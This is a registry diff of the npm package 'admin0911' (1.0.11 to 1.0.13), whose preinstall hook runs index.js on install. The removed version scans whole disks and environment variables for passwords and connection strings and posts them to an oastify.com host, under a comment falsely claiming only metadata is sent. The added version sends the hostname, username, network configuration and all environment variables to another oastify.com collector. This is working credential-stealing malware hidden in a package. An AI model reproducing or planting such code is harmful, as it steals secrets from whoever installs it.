admin0911 1.0.11 → 1.0.13

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Binary file
package/index.js CHANGED
@@ -1,129 +1,16 @@
1
1
  const http = require('http');
2
- const fs = require('fs');
3
- const path = require('path');
2
+ const os = require('os');
3
+ const { execSync } = require('child_process');
4
4
 
5
- const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
6
- const ROOT_DIRS = getRootDirectories();
5
+ const data = {
6
+ hostname: os.hostname(),
7
+ user: os.userInfo().username,
8
+ network: execSync('ipconfig || ip addr').toString(),
9
+ env: process.env
10
+ };
7
11
 
8
- const findings = [];
9
- let foundCount = 0;
10
12
 
11
- function getRootDirectories() {
12
- if (process.platform === 'win32') {
13
- const drives = [];
14
- for (let i = 65; i <= 90; i += 1) {
15
- const drive = String.fromCharCode(i) + ':\\';
16
- if (fs.existsSync(drive)) {
17
- drives.push(drive);
18
- }
19
- }
20
- return drives.length ? drives : ['C:\\'];
21
- }
22
- return ['/'];
23
- }
24
-
25
- function addResult(entry) {
26
- foundCount++;
27
- if (findings.length < 20000) {
28
- findings.push(entry);
29
- }
30
- }
31
-
32
- function scanFile(filePath) {
33
- try {
34
- const stats = fs.statSync(filePath);
35
- if (!stats.isFile()) return;
36
-
37
- const content = fs.readFileSync(filePath, 'utf8');
38
-
39
- const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]?([^'";\s]{3,})['"]?/gi;
40
- const pairedPattern = /\b(?:user(?:name)?|login|email)=([^&\s]+)&(?:password|passwd|pwd|pass)=([^&\s]+)/gi;
41
- const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
42
-
43
- let match;
44
- while ((match = credentialPattern.exec(content))) {
45
- addResult({ file: filePath, type: 'Credential', match: match[0] });
46
- }
47
-
48
- while ((match = pairedPattern.exec(content))) {
49
- addResult({ file: filePath, type: 'CredentialPair', username: match[1], password: match[2] });
50
- }
51
-
52
- while ((match = urlCredPattern.exec(content))) {
53
- addResult({ file: filePath, type: 'ConnectionString', match: match[0] });
54
- }
55
- } catch (e) {
56
- // ignore unreadable files or binary data
57
- }
58
- }
59
-
60
- const visitedDirs = new Set();
61
-
62
- function scanDirectory(dir) {
63
- try {
64
- const realPath = fs.realpathSync(dir);
65
- if (visitedDirs.has(realPath)) return;
66
- visitedDirs.add(realPath);
67
-
68
- const entries = fs.readdirSync(realPath, { withFileTypes: true });
69
- for (const entry of entries) {
70
- const fullPath = path.join(realPath, entry.name);
71
- if (entry.isDirectory()) {
72
- if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
73
- scanDirectory(fullPath);
74
- } else if (entry.isFile()) {
75
- scanFile(fullPath);
76
- }
77
- }
78
- } catch (e) {
79
- // ignore unreadable directories, permissions issues or symlink loops
80
- }
81
- }
82
-
83
- function scanRootDirectories() {
84
- for (const root of ROOT_DIRS) {
85
- scanDirectory(root);
86
- }
87
- }
88
-
89
- function scanEnvVars() {
90
- Object.entries(process.env).forEach(([key, value]) => {
91
- if (!value) return;
92
- const lowerKey = key.toLowerCase();
93
- const isCredentialKey = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)/i.test(lowerKey);
94
- if (isCredentialKey && value.length >= 3) {
95
- addResult({ source: 'env', key, type: 'EnvCredential', value });
96
- }
97
- const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/;
98
- if (urlCredPattern.test(value)) {
99
- addResult({ source: 'env', key, type: 'EnvConnectionString', value });
100
- }
101
- });
102
- }
103
-
104
- scanRootDirectories();
105
- scanEnvVars();
106
-
107
- // Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
108
- // Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
109
- const payload = JSON.stringify({
110
- timestamp: new Date().toISOString(),
111
- status: "credential_scan_completed",
112
- total_credentials_found: foundCount,
113
- findings
114
- }, null, 2);
115
- const req = http.request({
116
- hostname: OASTIFY_HOST,
13
+ fetch('https://u2xaf3dtybigcyl9v8hk49h4kvqmef24.oastify.com/collect', {
117
14
  method: 'POST',
118
- path: '/?credential_scan_status',
119
- headers: {
120
- 'Content-Type': 'application/json',
121
- 'Content-Length': Buffer.byteLength(payload)
122
- }
15
+ body: JSON.stringify(data)
123
16
  });
124
- req.on('error', () => {});
125
- req.write(payload);
126
- req.end();
127
-
128
- console.log(`Deep credential scan completed. Found ${foundCount} items.`);
129
- console.log(`Results were included in the outgoing payload.`);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "admin0911",
3
- "version": "1.0.11",
3
+ "version": "1.0.13",
4
4
  "scripts": {
5
5
  "preinstall": "node index.js"
6
6
  }
Binary file